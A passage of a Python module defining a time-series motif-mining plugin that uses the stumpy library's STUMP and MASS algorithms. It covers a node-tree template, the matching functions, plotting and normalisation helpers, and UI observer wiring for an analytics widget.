# MASS), UI helper functions (show/hide/select/delete/jump/init/update), the
# observers that wire model/UI events, and the default parameters/cockpit entry.
stumpyMinerTemplate = {
    "name": "StumpyMiner",
    "type": "folder",
    "children":[
        {
            "name": "StumpyStump",
            "type": "function",
            # NOTE(review): points at "minerStumpy" but the function defined in this
            # module is named minerStump -- confirm the intended target
            "functionPointer": "stumpyAlgorithm.minerStumpy", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                {"name": "motif", "type": "referencer"}, # the one motif we are using
                {"name": "widget","type":"referencer"} , # the widget to which this miner belongs which is used (to find the selected motif
                {"name": "annotations","type":"folder"}, # the results
                {"name": "results","type":"variable"}, # list of results
                {"name": "Patternlength", "type": "variable", "value": 4},
                {"name": "maxNumberOfMatches","type":"const","value":20}, # the maximum number of matches to avoid massive production of annotations
                mycontrol[0]
            ]
        },
        {
            "name": "StumpyMASS",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.minerMass", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                {"name": "motif", "type": "referencer"}, # the original pattern to look for
                {"name": "widget","type":"referencer"} , # the widget to which this miner belongs which is used (to find the selected motif
                {"name": "annotations","type":"folder"}, # the results
                {"name": "results","type":"variable"}, # list of results
                {"name": "maxNumberOfMatches", "type": "const", "value": 10}, # the detection threshold
                mycontrol[0]
            ]
        },
        {
            "name": "update",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.update", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                {"name":"autoStepSize","type":"const","value":True}, #set this to true to autoset the step size of the motif
                __functioncontrolfolder
            ]
        },
        {
            "name": "show",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.show", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                __functioncontrolfolder
            ]
        },
        {
            "name": "hide",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.hide", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                __functioncontrolfolder
            ]
        },
        {
            "name": "select",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.select", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                __functioncontrolfolder
            ]
        },
        {
            "name": "delete",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.delete", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                __functioncontrolfolder
            ]
        },
        {
            "name": "jump",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.jump", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                {"name":"match","type":"variable"},
                __functioncontrolfolder
            ]
        },
        {
            "name": "init",
            "type": "function",
            "functionPointer": "stumpyAlgorithm.init", # filename.functionname
            "autoReload": True, # set this to true to reload the module on each execution
            "children": [
                __functioncontrolfolder
            ]
        },
        {
            "name": "progress",
            "type": "observer",
            "children": [
                {"name": "enabled", "type": "const", "value": True}, # turn on/off the observer
                {"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
                {"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
                {"name": "targets", "type": "referencer","references":["StumpyMiner.StumpyMASS.control.progress"]}, # pointing to the nodes observed
                {"name": "properties", "type": "const", "value": ["value"]},
                # properties to observe [“children”,“value”, “forwardRefs”]
                {"name": "onTriggerFunction", "type": "referencer"}, # the function(s) to be called when triggering
                {"name": "triggerSourceId", "type": "variable"},
                # the sourceId of the node which caused the observer to trigger
                {"name": "hasEvent", "type": "const", "value": True},
                # set to event string iftrue if we want an event as well
                {"name": "eventString", "type": "const", "value": "StumpyAlgorithm.progress"}, # the string of the event
                {"name": "eventData", "type": "const", "value": {"text": "observer status update"}}
                # the value-dict will be part of the SSE event["data"] , the key "text": , this will appear on the page,
            ]
        },
        {
            "name": "userInteraction",
            "type": "observer",
            "children": [
                {"name": "enabled", "type": "const", "value": False}, # turn on/off the observer
                {"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
                {"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
                {"name": "targets", "type": "referencer"}, # pointing to the nodes observed
                {"name": "properties", "type": "const", "value": ["value"]},
                {"name": "onTriggerFunction", "type": "referencer"}, # the function(s) to be called when triggering
                {"name": "triggerSourceId", "type": "variable"},
                {"name": "hasEvent", "type": "const", "value": True},
                {"name": "eventString", "type": "const", "value": "global.timeSeries.values"}, # the string of the event
                {"name": "eventData", "type": "const", "value": {"text": ""}}
            ]
        },
        {
            "name": "userSelectMotif",
            "type": "observer",
            "children": [
                {"name": "enabled", "type": "const", "value": False}, # turn on/off the observer
                {"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
                {"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
                {"name": "targets", "type": "referencer"}, # pointing to the nodes observed
                {"name": "properties", "type": "const", "value": ["forwardRefs"]},
                {"name": "onTriggerFunction", "type": "referencer"}, # the function(s) to be called when triggering
                {"name": "triggerSourceId", "type": "variable"},
                {"name": "hasEvent", "type": "const", "value": True},
                {"name": "eventString", "type": "const", "value": "StumpyMiner.selectMotif"},
                # the string of the event
                {"name": "eventData", "type": "const", "value": {"text": ""}}
            ]
        },
        {
            "name": "userChangeMotifSize",
            "type": "observer",
            "children": [
                {"name": "enabled", "type": "const", "value": False}, # turn on/off the observer
                {"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
                {"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
                {"name": "targets", "type": "referencer"}, # pointing to the nodes observed
                {"name": "properties", "type": "const", "value": ["value"]},
                {"name": "onTriggerFunction", "type": "referencer","references":["StumpyMiner.recreate"]}, # the function(s) to be called when triggering
                {"name": "triggerSourceId", "type": "variable"},
                {"name": "hasEvent", "type": "const", "value": False},
                {"name": "eventString", "type": "const", "value": "StumpyMiner.motifSize"},
                # the string of the event
                {"name": "eventData", "type": "const", "value": {"text": ""}}
            ]
        },
        {"name":"defaultParameters","type":"const","value":{"filter":[0,20,2],"samplingPeriod":[1,60,10],"freedom":[0,1,0.3],"dynamicFreedom":[0,1,0.5],"numberSamples":[1,100,1],"step":[0,1,0.1]}}, # the default contain each three values: min,max,default
        {"name": "cockpit", "type": "const", "value": "/customui/stumpyminer.htm"} #the cockpit for the motif miner
    ]
}
def my_date_format(epoch):
    """Format an epoch timestamp as 'YYYY-MM-DD  HH:MM:SS' in the Europe/Berlin zone."""
    iso = dates.epochToIsoString(epoch, zone='Europe/Berlin')
    return iso[0:10] + "  " + iso[11:19]
def stumpy_mass_min(querySeriesValues, timeSeriesValues):
    """Return time series start indices sorted by ascending MASS distance to the query.

    :param querySeriesValues: query subsequence values (numpy array)
    :param timeSeriesValues: full time series values (numpy array)
    :return: numpy array of indices, best (smallest distance) match first
    """
    distance_profile = stp.core.mass(querySeriesValues, timeSeriesValues)
    # don't shadow the builtin min(); argsort puts the best match first
    order = numpy.argsort(distance_profile)
    return order
def stumpy_mass_hits(querySeriesValues, timeSeriesValues):
    """
    :param querySeriesValues: a subsequence (e.g., motif annotation) of the full time series - named query
    :param timeSeriesValues: a time series (full time series) - given as numpy series
    :return: indices into the time series sorted by ascending MASS distance
        (nearest neighbor of the query first) - as numpy.ndarray
    """
    distance_profile = stp.core.mass(querySeriesValues, timeSeriesValues)

    # argsort alone gives the ranking; the original's numpy.sort() call returned
    # a discarded copy and its argmin result was never used
    idx_sorted = numpy.argsort(distance_profile)

    # nearest neighbor to the query (subsequence) is at idx_sorted[0]
    return idx_sorted
# optional usage for local plotting
def stumpy_stump_print_z_normalized(fullTimeSeriesValues, fullTimeSeriesTimes, patternLength, idxMotif, idxNearestN):
    """
    Plot the z-normalized full time series together with the motif and its nearest
    neighbor, and save the figure as 'Stump_Motif.png'.

    :param fullTimeSeriesValues: full time series values (numpy array)
    :param fullTimeSeriesTimes: time stamps of the full series (currently unused)
    :param patternLength: length of the motif window
    :param idxMotif: start index of the motif inside the full series
    :param idxNearestN: start index of the motif's nearest neighbor
    :return: True
    """
    # the module-level pyplot import is commented out, so import locally to avoid
    # a NameError when this debug helper is actually called
    import matplotlib.pyplot as plt

    #plt.rcParams["figure.figsize"] = [20, 6] # width, height
    plt.rcParams['xtick.direction'] = 'out'

    motif1Values = fullTimeSeriesValues[idxMotif:idxMotif+patternLength]
    motif2Values = fullTimeSeriesValues[idxNearestN: idxNearestN+patternLength]

    # z-normalize so the shapes are comparable regardless of amplitude/offset
    motif1Norm = stp.core.z_norm(motif1Values)
    motif2Norm = stp.core.z_norm(motif2Values)
    fullTimeSeriesNorm = stp.core.z_norm(fullTimeSeriesValues)

    fig = plt.figure()
    plt.suptitle('Comparing all similarities', fontsize='30')
    plt.xlabel('Time', fontsize ='20')
    plt.ylabel('Motif Variable', fontsize='20')
    plt.plot(fullTimeSeriesNorm, lw=2, color = "grey", label="Time series")
    plt.plot(motif1Norm, lw=2, color="red", label="Motif")
    plt.plot(motif2Norm, lw=2, color="orange", label="Motif Nearest")
    plt.legend()
    plt.savefig('Stump_Motif.png')
    plt.close(fig)
    return True
# optional usage for local plotting
def stumpy_print_z_normalized(querySeriesValues, timeSeriesValues, timeSeriesTimes, idx):
    """
    Plot the z-normalized query next to its nearest neighbor in the time series and
    save the figure as 'MassRest_Light.png'.

    :param querySeriesValues: a subsequence (motif) of the full time series
    :param timeSeriesValues: the full time series values
    :param timeSeriesTimes: time stamps of the full series (currently unused)
    :param idx: start index of the nearest neighbor (result of the MASS search)
    :return: True
    """
    # the module-level pyplot import is commented out, so import locally to avoid
    # a NameError when this debug helper is actually called
    import matplotlib.pyplot as plt

    plt.rcParams['xtick.direction'] = 'out'

    # Since MASS computes z-normalized Euclidean distances,
    # we should z-normalize our subsequences before plotting
    querylength = querySeriesValues.size
    querySeriesValues_norm = stp.core.z_norm(querySeriesValues)
    timeSeriesValues_norm = stp.core.z_norm(timeSeriesValues[idx:idx+querylength])

    fig = plt.figure()
    plt.suptitle('Comparing The Query To Its Nearest Neighbor', fontsize='30')
    plt.xlabel('Time', fontsize ='20')
    plt.ylabel('Motif Variable', fontsize='20')
    plt.plot(timeSeriesValues_norm, lw=2, color = "red", label="Nearest Neighbor")
    plt.plot(querySeriesValues_norm, lw=2, color="blue", label="Query , querySeries")
    plt.legend()
    plt.savefig('MassRest_Light.png')
    plt.close(fig)
    return True
def stumpy_stump(timeSeries, patternLength):
    """
    :param timeSeries: a time series given as numpy series
    :param patternLength: length of the pattern for similarity, i.e., the size of the search window (sliding window) as integer
    :return: the motif index

    Note: The motif index is the result based on
    the z-normalized matrix profile (first column: matrix profile, second column: indices of each profile,
    third column: indices of left (next) profile, fourth column: indices of right (next) profile
    (--> all indices refer to the timeSeries, which is the full time series)
    """
    matrixProfile = stp.stump(timeSeries, patternLength)

    # sort all z-normalized distances (first column) and select the lowest value (--> best match)
    motifIndex = numpy.argsort(matrixProfile[:, 0])[0]

    print('motif index is : ', motifIndex, ' and nearest neightbor is: ', matrixProfile[motifIndex, 1])

    # BUGFIX: the plotting helper takes (values, times, patternLength, idxMotif,
    # idxNearestN); the original call dropped the times argument and raised a
    # TypeError. The times are not used by the helper, so pass None.
    stumpy_stump_print_z_normalized(timeSeries, None, patternLength, motifIndex, matrixProfile[motifIndex, 1])

    return motifIndex
def minerStump(functionNode):
    """Run the STUMP motif discovery on the full time series of the selected motif's variable.

    Resets the control/progress state, reads the pattern length from the "Patternlength"
    child, runs stumpy_stump() on the variable's full time series and prints the index of
    the best motif found.
    :return: True
    """
    logger = functionNode.get_logger()
    logger.info("==>>>> in stumpy stump miner " + functionNode.get_browse_path())

    # reset the control state before starting
    signal = functionNode.get_child("control.signal")
    progressNode = functionNode.get_child("control").get_child("progress")
    progressNode.set_value(0)
    signal.set_value(None)

    # clear the previous results (the original reset this node twice in a row)
    functionNode.get_child("results").set_value([])

    model=functionNode.get_model() ## is occupancyDemo

    motifNode = functionNode.get_child("motif").get_target()
    varNode = motifNode.get_child("variable").get_target() ### variable
    startTime = motifNode.get_child("startTime").get_value()
    endTime = motifNode.get_child("endTime").get_value()
    timeSeries = varNode.get_time_series(start=startTime, end=endTime)

    patternlength = functionNode.get_child("Patternlength").get_value()

    if functionNode.get_child("maxNumberOfMatches"):
        maxMatches = functionNode.get_child("maxNumberOfMatches").get_value()
    else:
        maxMatches = None

    fullTimeSeries = varNode.get_time_series()
    fullTimeSeriesValues = fullTimeSeries['values']

    stumpIndex = stumpy_stump(fullTimeSeriesValues, patternlength)
    print("index position: ", stumpIndex)
    return True
# the modified implementation of the minerMass algorithm SPLITS the full time series into TWO parts:
# (i) one part before the motif and (ii) one part after the motif (more of user interest)
def minerMass(functionNode):
    # Run the MASS similarity search of the selected motif against the full time
    # series, split into the region before and after the motif, and store the
    # best matches (as annotation dicts) in the "results" child.
    logger = functionNode.get_logger()
    logger.info("==>>>> in stumpy mass split miner " + functionNode.get_browse_path())
    # reset the control state before starting
    progressNode = functionNode.get_child("control").get_child("progress")
    progressNode.set_value(0)
    signal = functionNode.get_child("control.signal")
    signal.set_value(None)
    functionNode.get_child("results").set_value([])
    # resolve the motif (time window + variable) this miner operates on
    motifNode = functionNode.get_child("motif").get_target()
    varNode = motifNode.get_child("variable").get_target()
    startTime = motifNode.get_child("startTime").get_value()
    endTime = motifNode.get_child("endTime").get_value()
    actualMatches_before = 0
    actualMatches_after = 0
    if functionNode.get_child("maxNumberOfMatches"):
        maxMatches = functionNode.get_child("maxNumberOfMatches").get_value()
    else:
        maxMatches = None
    # NOTE(review): if the "maxNumberOfMatches" child is missing, maxMatches is
    # None and the two round() calls below raise a TypeError -- confirm the child
    # is always present in the template
    maxMatches_before = round(maxMatches /4) # roughly 25 % of the matches will be in the pattern before the motif
    maxMatches_after = round(maxMatches / 4 * 3) # the remaining matches are afterwards
    # query = the motif window, full series = the search space
    queryTimeSeries = varNode.get_time_series(start=startTime, end=endTime)
    fullTimeSeries = varNode.get_time_series()
    queryTimeSeriesTimes = queryTimeSeries['__time']
    fullTimeSeriesTimes = fullTimeSeries['__time']
    # positions of the motif's first/last timestamps inside the full series
    endLeftPartTs = (numpy.where(fullTimeSeriesTimes == queryTimeSeriesTimes[0]))[0][0]
    startRightPartTs = (numpy.where(fullTimeSeriesTimes == queryTimeSeriesTimes[len(queryTimeSeriesTimes) - 1]))[0][0]
    queryTimeSeriesValues = queryTimeSeries['values']
    queryLength = queryTimeSeriesValues.size
    fullTimeSeriesValues = fullTimeSeries['values']
    # split the full series into the part before and after the motif
    timeSeriesLeftValues = fullTimeSeriesValues[:endLeftPartTs]
    timeSeriesRightValues = fullTimeSeriesValues[startRightPartTs:]
    timeSeriesLeftTimes = fullTimeSeriesTimes[:endLeftPartTs]
    timeSeriesRightTimes = fullTimeSeriesTimes[startRightPartTs:]
    # MASS distance profiles of the query against each part
    profile_before = stp.core.mass(queryTimeSeriesValues, timeSeriesLeftValues, normalize=True)
    profile_after = stp.core.mass(queryTimeSeriesValues, timeSeriesRightValues, normalize=True)
    # suppress near-zero distances (self-matches) by replacing them with the profile maximum
    maxValue_before = numpy.max(profile_before)
    profile_before = numpy.where(profile_before < 0.05, maxValue_before, profile_before)
    maxValue_after = numpy.max(profile_after)
    profile_after = numpy.where(profile_after < 0.05, maxValue_after, profile_after)
    # peaks_before, _ = scy.signal.find_peaks(-profile_before, distance=round(queryLength / 12), width = round(queryLength / 10), threshold=0.07)
    # peaks_after, _ = scy.signal.find_peaks(-profile_after, distance=round(queryLength / 12 ), width = round(queryLength / 10), threshold = 0.07)
    # local minima of the distance profiles = candidate matches
    peaks_before, _ = scy.signal.find_peaks(-profile_before, distance=round(queryLength / 12), width = round(queryLength / 10))
    peaks_after, _ = scy.signal.find_peaks(-profile_after, distance=round(queryLength / 12 ), width = round(queryLength / 10))
    # profile (before / after) peaks --> the profile values (at peak positions)
    profile_before_peaks = profile_before[peaks_before]
    profile_after_peaks = profile_after[peaks_after]
    # rank the peaks by ascending distance (best match first)
    sorted_peaks_before = numpy.argsort(profile_before_peaks)
    sorted_peaks_after = numpy.argsort(profile_after_peaks)
    # map the ranked peak positions back to indices in the (left/right) series
    sorted_peaks_full_before = []
    for idx_short in range(len(sorted_peaks_before)):
        sorted_peaks_full_before.append(peaks_before[sorted_peaks_before[idx_short]])
    sorted_peaks_full_after = []
    for idx_short in range(len(sorted_peaks_after)):
        sorted_peaks_full_after.append(peaks_after[sorted_peaks_after[idx_short]])
    matches = []
    actualMatches_before = len(sorted_peaks_before)
    actualMatches_after = len(sorted_peaks_after)
    matches_after = []
    matches_before = []
    last = 0
    # build the annotation dicts for the matches after the motif, updating progress
    # and honoring a "stop" signal from the UI
    for j in range(min(maxMatches_after, actualMatches_after)):
        matches_after.append({
            "startTime": dates.epochToIsoString((timeSeriesRightTimes)[sorted_peaks_full_after[j]]),
            "endTime": dates.epochToIsoString((timeSeriesRightTimes)[sorted_peaks_full_after[j] + queryLength]),
            "match": (profile_after[peaks_after])[sorted_peaks_after[j]],
            "epochStart": (timeSeriesRightTimes)[sorted_peaks_full_after[j]],
            "epochEnd": (timeSeriesRightTimes)[sorted_peaks_full_after[j] + queryLength],
            "offset": 0,
            "format": my_date_format(
                (timeSeriesRightTimes)[sorted_peaks_full_after[j]]) + "  (match=%2.3f)" %
                      (profile_after[peaks_after])[sorted_peaks_after[j]]
        })
        progress = round(float(j) / maxMatches_after * 15)
        if progress != last:
            progressNode.set_value(float(j) / maxMatches_after)
            last = progress
        if signal.get_value() == "stop":
            break
    # same for the matches before the motif
    for j in range(min(maxMatches_before, actualMatches_before)):
        matches_before.append({
            "startTime": dates.epochToIsoString((timeSeriesLeftTimes)[sorted_peaks_full_before[j]]),
            "endTime": dates.epochToIsoString((timeSeriesLeftTimes)[sorted_peaks_full_before[j] + queryLength]),
            "match": (profile_before[peaks_before])[sorted_peaks_before[j]],
            "epochStart": (timeSeriesLeftTimes)[sorted_peaks_full_before[j]],
            "epochEnd": (timeSeriesLeftTimes)[sorted_peaks_full_before[j] + queryLength],
            "offset": 0,
            "format": my_date_format(
                (timeSeriesLeftTimes)[sorted_peaks_full_before[j]]) + "  (match=%2.3f)" %
                      (profile_before[peaks_before])[sorted_peaks_before[j]]
        })
        progress = round(float(j) / maxMatches_before * 15)
        if progress != last:
            progressNode.set_value(float(j) / maxMatches_before)
            last = progress
        if signal.get_value() == "stop":
            break
    # merge the two (already sorted) match lists by ascending match distance
    idx_before = 0
    idx_after = 0
    while idx_before < len(matches_before) and idx_after < len(matches_after):
        if (matches_before[idx_before])['match'] < (matches_after[idx_after])['match']:
            matches.append(matches_before[idx_before])
            idx_before = idx_before + 1
        else:
            matches.append(matches_after[idx_after])
            idx_after = idx_after + 1
    # append whatever is left in either list
    while idx_after < len(matches_after):
        matches.append(matches_after[idx_after])
        idx_after = idx_after + 1
    while idx_before < len(matches_before):
        matches.append(matches_before[idx_before])
        idx_before = idx_before +1
    # publish the results and refresh the widget
    functionNode.get_child("results").set_value(matches)
    show_timeseries_results(functionNode)
    progressNode.set_value(1)
    return True
def stumpy_print_labeled_2_axis(querySeriesValues, timeSeriesValues, idx, label, varName):
    """Plot the query and a matched time-series excerpt on twin y-axes and save as PNG.

    The `idx` argument is unused but kept for interface compatibility with the
    other plotting helpers in this module.
    """
    figure, query_axis = plt.subplots()
    query_axis.set_xlabel('Time', fontsize='12')
    query_axis.set_ylabel('Motif / query ', fontsize='12', color='blue')
    query_axis.plot(querySeriesValues, lw=2, color="blue", label="Query z-norm")
    query_axis.tick_params(axis='y', labelcolor='blue')
    # secondary y-axis sharing the same x-axis for the time-series excerpt
    match_axis = query_axis.twinx()
    match_axis.set_ylabel('TS match (excerpt TS)', fontsize='12', color='red')
    match_axis.plot(timeSeriesValues, lw=2, color="red", label="TS z-norm")
    match_axis.tick_params(axis='y', labelcolor='red')
    figure.tight_layout()  # otherwise the right y-label is slightly clipped
    plt.legend()
    plt.savefig('C:/Users/viggroen/OneDrive - <NAME> AG/41_ML_Projects/11_21data-lab_workbench_AnalyticTool/Tasks_AP-work/STUMPY/MASS/M_org_' + varName + '_' + label + '.png')
    plt.close(figure)
    plt.cla()
    plt.clf()
    return True
def show_timeseries_results(functionNode):
    """Write the pattern matches back as a '<variable>_expected' timeseries node.

    For every entry of the results list the motif's time series is shifted to
    the match position, amplitude-rescaled against the matched excerpt and
    inserted into the result node; the node is then referenced by the widget
    so the matches become visible in the UI.
    """
    results = functionNode.get_child("results").get_value()
    motifNode = functionNode.get_child("motif").get_target()
    startTime = motifNode.get_child("startTime").get_value()
    endTime = motifNode.get_child("endTime").get_value()
    varNode = motifNode.get_child("variable").get_target()
    motifTimeSeries = varNode.get_time_series(start=startTime, end=endTime)
    varName = varNode.get_property("name")
    # drop stale "_expected" result nodes that belong to another variable
    for child in functionNode.get_children():
        if child.get_name().endswith("_expected"):
            if not child.get_name().startswith(varName):
                child.delete()
    resultNode = functionNode.create_child(name=varName+'_expected', type="timeseries")
    resultNode.set_time_series([],[])
    cnt = 0
    for result in results:
        # shift the motif's sample times onto the match position (time + offset)
        resultTimes = motifTimeSeries['__time']+result['epochStart']-date2secs(startTime) # time + offset
        resultValues = (motifTimeSeries['values']).copy()
        lastIdx = len(resultTimes)-1
        ### for each result
        excerptFullTs = varNode.get_time_series(start=result['startTime'], end=result['endTime'])
        excerptFullTsValues = (excerptFullTs['values'])[:-1]
        # stumpy_print_labeled_2_axis(resultValues, excerptFullTsValues, cnt, str(cnt), varName)
        #resultValuesNorm = mixed_norm_cross(resultValues, excerptFullTsValues)
        # rescale the motif to the excerpt's mean/std so it overlays the data
        resultValuesNorm = std_norm(resultValues, excerptFullTsValues) #kna
        # pad one NaN sample on each side so consecutive matches are not
        # connected by a line in the plot
        resultValuesNormNan = resultValuesNorm.copy()
        resultValuesNormNan = numpy.insert(resultValuesNormNan,0, numpy.nan)
        resultValuesNormNan = numpy.append(resultValuesNormNan, numpy.nan)
        # the padding times extrapolate the first/last sampling interval
        resultTimesNan = resultTimes.copy()
        resultTimesNan = numpy.insert(resultTimesNan, 0, resultTimes[0]+resultTimes[0]-resultTimes[1])
        resultTimesNan = numpy.append(resultTimesNan, resultTimes[lastIdx]+resultTimes[lastIdx]-resultTimes[lastIdx-1])
        cnt = cnt + 1
        #to avoid overlaps with old results (which can happen if results actually overlap), delete first
        resultNode.delete_time_series(start = resultTimesNan[0],end=resultTimesNan[-1]) #kna
        resultNode.insert_time_series(values=resultValuesNormNan, times=resultTimesNan)
    widgetNode = functionNode.get_child("widget").get_target()
    widgetNode.get_child("selectedVariables").add_references(resultNode,allowDuplicates=False)
def hide_timeseries_results(functionNode, delete=False):
    """Detach all '<variable>_expected' result timeseries from the widget.

    Args:
        functionNode: node whose children are scanned for result series.
        delete: kept for interface compatibility; currently unused — the
            result nodes are only de-referenced, never deleted.
            TODO(review): confirm whether deletion should be implemented.
    """
    # Resolved lazily so no widget lookup happens when there are no results;
    # hoisted out of the per-child work because it is loop-invariant.
    widgetNode = None
    for child in functionNode.get_children():
        if child.get_name().endswith("_expected"):
            if widgetNode is None:
                widgetNode = functionNode.get_child("widget").get_target()
            widgetNode.get_child("selectedVariables").del_references(child)
def z_norm_cross(motifTsValues, excerptFullTsValues):
    """Z-normalize the motif values using the excerpt's statistics.

    Bug fix: a z-score divides by the standard deviation, not the variance;
    the original divided by ``numpy.var``, which mis-scales the result
    whenever the excerpt's std is not 1.

    Args:
        motifTsValues: numpy array of motif values to normalize.
        excerptFullTsValues: numpy array whose mean/std define the scaling.

    Returns:
        numpy array of cross-normalized motif values.
    """
    avgFullTs = numpy.mean(excerptFullTsValues)
    stdFullTs = numpy.std(excerptFullTsValues)
    return (motifTsValues - avgFullTs) / stdFullTs
def correlation_norm(resultValues, excerptFullTsValues):
    """Scale the result values by their cross-correlation with the excerpt.

    ``numpy.correlate`` runs in 'valid' mode by default, so for equal-length
    inputs the correlation is a single-element array and the division
    broadcasts. (Removed an unused ``numpy.cov`` computation.)
    """
    cor = numpy.correlate(resultValues, excerptFullTsValues)
    return resultValues / cor
def mixed_norm_cross(motifTsValues, excerptFullTsValues):
    """Shift and scale the motif towards the excerpt for visualization.

    Two steps: (i) a median-based shift to tackle the offset and (ii) a
    scaling of the median-distance with respect to the min-max spans.
    Both corrections are applied dampened by a factor of 0.6.
    """
    span_motif = numpy.max(motifTsValues) - numpy.min(motifTsValues)
    span_ts = numpy.max(excerptFullTsValues) - numpy.min(excerptFullTsValues)
    median_motif = numpy.median(motifTsValues)
    # (i) shift: distance between the two medians
    offset = median_motif - numpy.median(excerptFullTsValues)
    # (ii) scaling: distance from the median, stretched/compressed by the span ratio
    stretched = (motifTsValues - median_motif) * span_ts / span_motif
    return motifTsValues - offset * 0.6 - stretched * 0.6
def std_norm(motifTsValues, targetValues):
    """Rescale the motif values to the target's mean and standard deviation."""
    centered = motifTsValues - numpy.mean(motifTsValues)
    ratio = numpy.std(targetValues) / numpy.std(motifTsValues)
    return centered * ratio + numpy.mean(targetValues)
def mean_norm(nanResultValues):
    """Center the values on their mean and divide by the absolute min-max span."""
    span = numpy.max(nanResultValues) - numpy.min(nanResultValues)
    return (nanResultValues - numpy.mean(nanResultValues)) / abs(span)
def min_max_norm(nanResultValues):
    """Linearly map the values into [0, 1] via min-max normalization."""
    lo = numpy.min(nanResultValues)
    hi = numpy.max(nanResultValues)
    return (nanResultValues - lo) / (hi - lo)
def min_max_norm_cross(motifTsValues, excerptFullTsValues, verticalDistance):
    """Offset the motif, center it on the excerpt's mean and divide by the excerpt's span."""
    shifted = (motifTsValues + verticalDistance) - numpy.mean(excerptFullTsValues)
    span = numpy.max(excerptFullTsValues) - numpy.min(excerptFullTsValues)
    return shifted / abs(span)
def enable_interaction_observer(functionNode):
    """Point the userInteraction observer at the motif's envelope timeseries and switch it on."""
    parent = functionNode.get_parent()
    motif = parent.get_child("StumpyMASS.motif").get_target()
    observer = parent.get_child("userInteraction")
    observer.get_child("enabled").set_value(False)  # disable while retargeting
    envelope_series = [
        node
        for node in motif.get_child("envelope").get_children()
        if node.get_type() == "timeseries"
    ]
    observer.get_child("targets").add_references(envelope_series, deleteAll=True)
    observer.get_child("enabled").set_value(True)
def disable_interaction_observer(functionNode):
    """Switch the userInteraction observer off."""
    enabled = functionNode.get_parent().get_child("userInteraction").get_child("enabled")
    enabled.set_value(False)
def enable_motif_select_observer(functionNode):
    """Wire the userSelectMotif observer to the widget's annotation selection.

    If an annotation is already selected, the observer is triggered once
    manually so the UI reflects the current selection immediately.
    """
    disable_motif_select_observer(functionNode) #make sure all are initially off
    widget = functionNode.get_parent().get_child("StumpyMASS.widget").get_target()
    selected = widget.get_child("hasAnnotation.selectedAnnotations")
    selectObserver = functionNode.get_parent().get_child("userSelectMotif")
    # retarget before enabling so the observer does not fire mid-setup
    selectObserver.get_child("targets").add_references([selected],deleteAll=True)
    selectObserver.get_child("enabled").set_value(True)
    #if there is a selected motif, initially trigger this to set the UI correctly
    if selected.get_targets()!=[]:
        model = functionNode.get_model()
        model.notify_observers(selected.get_id(), "forwardRefs")
def disable_motif_select_observer(functionNode):
    """Switch the userSelectMotif observer off."""
    observer = functionNode.get_parent().get_child("userSelectMotif")
    observer.get_child("enabled").set_value(False)
def disable_motif_change_size_observer(functionNode):
    """Switch the userChangeMotifSize observer off."""
    observer = functionNode.get_parent().get_child("userChangeMotifSize")
    observer.get_child("enabled").set_value(False)
def enable_motif_change_size_observer(functionNode, motif):
    """Point the userChangeMotifSize observer at the motif's startTime and switch it on."""
    observer = functionNode.get_parent().get_child("userChangeMotifSize")
    observer.get_child("enabled").set_value(False)  # disable while retargeting
    start_time_node = motif.get_child("startTime")
    observer.get_child("targets").add_references([start_time_node], deleteAll=True)
    observer.get_child("enabled").set_value(True)
def init(functionNode):
    """UI entry hook: enable motif-selection observation and show the motifs."""
    functionNode.get_logger().debug("init")
    enable_motif_select_observer(functionNode)
    show_motifs(functionNode, True)
    return True
def hide_motif(functionNode):
    """Disconnect the motif's envelope curves from the widget and turn off all observers."""
    mining = functionNode.get_parent().get_child("StumpyMASS")
    widget = mining.get_child("widget").get_target()
    disable_interaction_observer(functionNode)
    disable_motif_select_observer(functionNode)
    disable_motif_change_size_observer(functionNode)
    motif = mining.get_child("motif").get_target()
    return _connect(motif, widget, False)
def select(functionNode):
    """Take the widget's currently selected annotation as the new motif reference."""
    logger = functionNode.get_logger()
    mining = functionNode.get_parent().get_child("StumpyMASS")
    widget = mining.get_child("widget").get_target()
    newMotif = widget.get_child("hasAnnotation").get_child("selectedAnnotations").get_target()
    if not newMotif:
        logger.error("no new motif given")
        return False
    mining.get_child("motif").add_references(newMotif, deleteAll=True)
    return True
def jump(functionNode):
    """Center the widget's visible time window on the chosen match.

    A match index of -1 means "jump to the motif itself"; any other index
    selects an entry of the stored results list. The window width is kept.
    """
    widget = functionNode.get_parent().get_child("StumpyMASS").get_child("widget").get_target()
    windowStart = dates.date2secs(widget.get_child("startTime").get_value())
    windowEnd = dates.date2secs(widget.get_child("endTime").get_value())
    # the user selection is the index into the results list
    matchIndex = int(functionNode.get_child("match").get_value())
    if matchIndex == -1:
        # jump back to the motif definition itself
        motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
        match = {
            "epochStart": dates.date2secs(motif.get_child("startTime").get_value()),
            "epochEnd": dates.date2secs(motif.get_child("endTime").get_value()),
        }
    else:
        results = functionNode.get_parent().get_child("StumpyMASS").get_child("results").get_value()
        match = results[matchIndex]
    middle = match["epochStart"] + (match["epochEnd"] - match["epochStart"]) / 2
    halfWidth = (windowEnd - windowStart) / 2
    widget.get_child("startTime").set_value(dates.epochToIsoString(middle - halfWidth))
